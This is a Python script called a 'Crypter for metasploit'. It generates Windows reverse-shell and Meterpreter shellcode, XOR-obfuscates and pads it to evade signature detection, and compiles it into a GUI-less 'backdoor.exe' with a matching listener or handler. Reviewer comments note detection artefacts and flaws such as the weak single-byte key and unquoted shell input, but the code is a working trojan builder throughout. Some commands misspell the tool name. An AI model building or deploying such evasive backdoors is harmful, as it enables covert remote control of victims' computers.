- #!/usr/bin/python
- #=====================================
- #
- # This Script requires
- # http://pastebin.com/yfbYZRwc
- #
- #=====================================
- #coding: utf-8
- from struct import *
- import os
- import commands
- import subprocess
- import random
- # Operator prompt section: clears the terminal, prints the banner, then reads the
- # callback address (lhost) and port (lport) that are later passed to the payload
- # generator and written into handler.rc.
- os.system("clear")
- print "*********************************************"
- print " : Crypter for metasploit :"
- print " Edited by: Sh3LlDu5t and Cyb4FrE3z"
- print "*********************************************"
- print ""
- host = raw_input("lhost (e for external ip) ?").strip()
- # NOTE(review): the 'e' choice shells out to curl against checkip.dyndns.org and
- # round-trips the response through ip.txt in the current directory. The response is
- # used as-is; no parsing or validation of it is visible here. ">>" appends, so any
- # pre-existing ip.txt content would be read back as well.
- if host == 'e':
- os.system("curl checkip.dyndns.org >> ip.txt")
- lhost = commands.getoutput('cat ip.txt')
- os.system("rm ip.txt")
- os.system("clear")
- print "[*] lhost: ", lhost
- else:
- lhost = host
- print "[*] lhost: ", lhost
- # NOTE(review): lhost and lport are free-form raw_input() text. Further down they are
- # %-formatted directly into os.system() command strings without quoting, so shell
- # metacharacters in either value would be interpreted by the shell on the machine
- # running this script.
- lport = raw_input("lport ?").strip()
- print "[*] lport: ", lport
- # Payload menu: seven Windows reverse-connection payload names are listed and the
- # operator's choice is kept as a string ("1".."7"); it is not validated here.
- print "**************************************"
- print "1) windows/shell_reverse_tcp"
- print "2) windows/shell/reverse_tcp"
- print "3) windows/shell/reverse_tcp_dns"
- print "4) windows/shell/reverse_http"
- print "5) windows/meterpreter/reverse_tcp"
- print "6) windows/meterpreter/reverse_tcp_dns"
- print "7) windows/meterpreter/reverse_http"
- print "**************************************"
- payload = raw_input("Select a payload (1-7):").strip()
- # Fixed working-file names, all relative to the current directory.
- payload_raw = "temp.raw"
- out = "temp.c"
- # structure.c is the C template; the header comment says it comes from a separate
- # paste, and its contents are not shown on this page.
- structure = "structure.c"
- # NOTE(review): the "key" is a single byte drawn from the `random` module, which is not
- # a cryptographic source. With only 256 possible values (0 included, which leaves bytes
- # unchanged under XOR) this is obfuscation rather than encryption: an analyst can
- # recover the plaintext by trying every key.
- key = random.randint(0,255)
- # Padding generation: builds two double-quoted strings of random uppercase ASCII
- # letters (codes 65-90). Both are later substituted into the C template.
- print "[*] Generating random junk..."
- print "[*] Randomizing file size..."
- # One length is drawn per run, between 20480 and 25600.
- randomSize = random.randint(20480,25600)
- junkA = ""
- junkB = ""
- junkA += "\""
- # xrange(1, randomSize) yields randomSize-1 letters, one fewer than junkB below.
- for i in xrange(1,randomSize):
- junkA += chr(random.randint(65,90))
- junkA += "\""
- junkB += "\""
- for i in xrange(0,randomSize):
- junkB += chr(random.randint(65,90))
- junkB += "\""
- # NOTE(review): because the padding length and content change on every run, each build
- # differs in size and file hash, so hash-based indicators do not generalise across
- # builds. The padding itself is structurally distinctive: two long runs drawn only
- # from A-Z. Where these strings end up in the compiled file depends on structure.c,
- # which is not shown here.
- # Shellcode generation: each branch builds one shell command string with
- # -p <payload name>, LHOST/LPORT, the x86/shikata_ga_nai encoder at 8 iterations
- # (-i 8) and raw output (-f raw -o) to the temp.raw file name, then runs it via
- # os.system().
- # NOTE(review): lhost and lport are interpolated unquoted into the shell string, and
- # the os.system() return code is discarded. There is no else branch, so a menu answer
- # outside "1".."7" runs no command at all.
- # NOTE(review): this encoder output is wrapped again by the XOR/interleave step that
- # follows, so static signatures written for the encoder's decoder stub would
- # presumably not match the bytes stored in the final file; the stub would only be
- # visible once decoded in memory - confirm against structure.c.
- print "[*] Generating metasploit shellcode..."
- if payload == "1":
- os.system("msfvemon -p windows/shell_reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s " % (lhost,lport,payload_raw))
- elif payload == "2":
- os.system("msfvemon -p windows/shell/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "3":
- os.system("msfvenom -p windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "4":
- os.system("msfvenom -p windows/shell/reverse_http LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "5":
- os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "6":
- os.system("msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "7":
- os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- # Obfuscation and template fill: reads the raw shellcode, XORs every byte with the
- # single-byte key, interleaves one random uppercase letter after each encoded byte,
- # renders the result as C "\x.." string literals and substitutes it into structure.c.
- a = open(payload_raw,"rb")
- b = open(out,"w")
- # payload_raw is rebound here from the file name to the file's contents.
- payload_raw = a.read()
- tempArray = []
- outArray = []
- x = 0
- print "[*] Encoding with XOR key: ", hex(key)
- print "[*] Obfuscating shellcode..."
- # The output is exactly twice the input length: even positions carry data, odd
- # positions carry filler.
- length = int(len(payload_raw)*2)
- for i in xrange(0,length):
- if i % 2 == 0:
- tempArray.append(unpack("B",payload_raw[x])[0]^key)
- x += 1
- else:
- randomByte = random.randint(65,90)
- tempArray.append(randomByte)
- # NOTE(review): the resulting layout is a structural indicator that survives the
- # per-build randomisation: in the encoded blob every second byte falls in 0x41-0x5A,
- # and the bytes in between decode under one of only 256 XOR keys.
- for i in range(0,len(tempArray)):
- tempArray[i]="\\x%x"%tempArray[i]
- # Emit the escapes as adjacent C string literals, 15 escapes per line.
- for i in range(0,len(tempArray),15):
- outArray.append('\n"'+"".join(tempArray[i:i+15])+"\"")
- outArray = "".join(outArray)
- devide = "i % 2;"
- open_structure = open(structure).read()
- # Six %-slots of the template receive, in order: junkA, the encoded blob, junkB, the
- # XOR key, the blob length and the literal text "i % 2;".
- # NOTE(review): the key and length are handed to the template in clear, so the
- # generated source carries everything needed to reverse the encoding; presumably the
- # template decodes at run time - structure.c is not shown, confirm there.
- code = open_structure % (junkA,outArray,junkB,key,length,devide)
- b.write(code)
- # NOTE(review): neither `a` nor `b` is closed; `b` is only flushed before the compiler
- # reads temp.c.
- b.flush()
- # Build step: cross-compiles temp.c with the MinGW toolchain, strips debug symbols
- # from the resulting a.exe and renames it to backdoor.exe in the current directory.
- # NOTE(review): every os.system() return code is ignored, so a failed compile is not
- # detected before the strip and mv steps run.
- # NOTE(review): -mwindows builds for the Windows GUI subsystem, so the program does
- # not open a console window when run. The toolchain name and the fixed file names
- # (temp.c, a.exe, backdoor.exe) are artefacts to look for when triaging a suspected
- # build host.
- print "[*] Compiling trojan horse..."
- os.system("i586-mingw32msvc-gcc -mwindows temp.c")
- print "[*] Stripping out the debugging symbols..."
- os.system("strip --strip-debug a.exe")
- print "[*] Finishing..."
- os.system("mv a.exe backdoor.exe")
- # Listener setup: option 1 starts a netcat listener on lport; options 2-7 only record
- # the matching payload name in PAYLOAD for the handler resource file written below.
- # NOTE(review): lport is interpolated unquoted into the nc command string passed to
- # os.system().
- if payload == "1":
- print "[*] Starting the netcat listener..."
- os.system("nc -lvp %s" % (lport))
- elif payload == "2":
- PAYLOAD = "windows/shell/reverse_tcp"
- elif payload == "3":
- PAYLOAD = "windows/shell/reverse_tcp_dns"
- elif payload == "4":
- PAYLOAD = "windows/shell/reverse_http"
- elif payload == "5":
- PAYLOAD = "windows/meterpreter/reverse_tcp"
- elif payload == "6":
- PAYLOAD = "windows/meterpreter/reverse_tcp_dns"
- elif payload == "7":
- PAYLOAD = "windows/meterpreter/reverse_http"
- # The intermediate files are deleted with rm; backdoor.exe and handler.rc are the
- # files left in the working directory.
- print "[*] Cleaning up..."
- os.system("rm temp.c")
- os.system("rm temp.raw")
- # Write the handler resource file: multi/handler with the chosen payload, LHOST and
- # LPORT, ExitOnSession false, started as a background job (exploit -j).
- # NOTE(review): handler.rc stores the callback address and port in plain text, which
- # makes it a useful artefact when examining a host this script was run on.
- filewrite = file("handler.rc", "w")
- filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (PAYLOAD,lhost,lport))
- filewrite.close()
- # Optionally start the handler; any answer other than "y" or "n" falls through to the
- # final message without further output.
- ans = raw_input("Do you want to start a handler now? (y/n)").strip()
- if ans == "y":
- print "[*] Starting metasploit handler..."
- os.system("msfconsole -r handler.rc")
- elif ans == "n":
- print "[*] Run msfconsole -r handler.rc to start handler"
- print "[*] Done !"